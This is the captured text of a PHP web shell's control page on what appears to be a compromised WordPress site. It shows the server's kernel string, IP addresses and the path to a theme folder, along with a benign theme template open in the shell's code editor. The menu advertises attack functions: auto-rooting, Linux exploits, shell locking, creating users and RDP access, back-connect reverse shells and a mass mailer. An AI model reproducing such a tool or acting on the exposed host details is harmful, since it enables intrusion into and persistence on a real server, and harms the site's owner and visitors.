FreeBSD s15.mydevil.net 14.1-RELEASE-p4 FreeBSD 14.1-RELEASE-p4 #3 releng/14.1-n267709-86d01789bf41-dirty: Thu Sep 5 04:26:54 CEST 2024 root@pkg1.admin.net.pl:/usr/obj/usr/src/amd64.amd64/sys/devil amd64
Apache/N-G-I-N-X-htaccess-support
: 128.204.218.142 | : 3.15.0.212
Cant Read [ /etc/named.conf ]
?8.1.30
art
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
home /
art /
domains /
rotarycup.pl /
public_html /
wp-content /
themes /
sportcenter /
templates /
blog /
[ HOME SHELL ]
Name
Size
Permission
Action
index.php
8.47
KB
-r--r--r--
loop-item-thumbnail.php
4.03
KB
-rw-r--r--
loop-item.php
1.54
KB
-rw-r--r--
loop-none.php
846
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : loop-item.php
<div <?php post_class('blog-item '.(has_post_thumbnail()?'':' no-thumbnail')) ?>> <div class="post-item blog-post-item row"> <?php if(has_post_thumbnail()){ ?> <div class="col-md-6 col-sm-12"> <div class="content-pad"> <div class="blog-thumbnail"> <?php get_template_part('templates/blog/loop','item-thumbnail'); ?> </div><!--/blog-thumbnail--> </div> </div> <?php } ?> <div class="<?php echo has_post_thumbnail()?'col-md-6':'col-md-12' ?> col-sm-12"> <div class="content-pad"> <div class="item-content"> <h3 class="item-title font-2"><a href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>" class="main-color-1-hover"><?php the_title(); ?></a></h3> <div class="item-excerpt blog-item-excerpt"><?php the_excerpt(); ?></div> <div class="item-meta blog-item-meta"> <span><i class="fa fa-user"></i> <?php the_author_posts_link(); ?> </span> <span><i class="fa fa-bookmark"></i> <?php the_category(' <span class="dot">.</span> '); ?></span> </div> <a class="btn btn-lighter" href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>"><?php _e('DETAIL','sportcenter') ?> <i class="fa fa-angle-right"></i></a> </div> </div> </div> </div><!--/post-item--> </div><!--/blog-item-->
Close